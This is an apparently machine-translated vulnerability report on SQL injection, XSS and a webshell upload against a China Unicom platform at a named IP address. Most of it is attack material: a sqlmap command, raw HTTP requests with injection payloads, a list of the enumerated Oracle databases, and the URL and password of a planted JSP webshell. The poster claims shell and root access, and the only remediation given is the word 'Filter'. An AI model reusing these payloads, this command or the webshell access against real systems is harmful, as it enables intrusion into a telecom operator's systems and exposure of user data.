Multiple SQL injection and XSS (GetShell) on one or two platforms of China Unicom)
I don't know how much the impact will be on multiple SQL + upload + shell + root databases on one or two platforms of China Unicom. There are 11 databases, the current database has 606 tables, and there are more than a dozen user tables, one of which users are all agents. I got the shell and root permissions and did not dare to go into SQL: sqlmap-r '/root/Desktop/100' -- dbms = oracle -- data = "loginName = 1 & password1 = g" -- SQL-shell 1,
POST /reg/modifyPasswordDo.html HTTP/1.1Content-Length: 157Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://211.95.193.67:80/Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBAHost: 211.95.193.67Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*loginName=1&password1=g&phoneCode=555-666-0606&phoneNo=555-666-0606
2,
POST /web/list.html HTTP/1.1Content-Length: 49Content-Type: application/x-www-form-urlencodedReferer: http://211.95.193.67:80/Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBAHost: 211.95.193.67Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*orderBy=code&pageNo=1&prices=1'%22&productTypeid=
3,
POST /reg/modifyPasswordDo.html HTTP/1.1Content-Length: 155Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://211.95.193.67:80/Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBAHost: 211.95.193.67Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*loginName=pplxundg&password=g00dPa%24%24w0rD&password1=g00dPa%24%24w0rD&phoneCode=555-666-0606&phoneNo=-1'%20OR%203*2*1%3d6%20AND%20000949%3d000949%20--%20
available databases [11]:[*] DBSNMP[*] EXFSYS[*] OUTLN[*] QDYX`[*] QDYX_YJ[*] QDYXTEST[*] SYS[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
Upload ROOT shell http: // 211.95.193.67/files/head/20141103183718. jspwebshell password: jspspy solution: Filter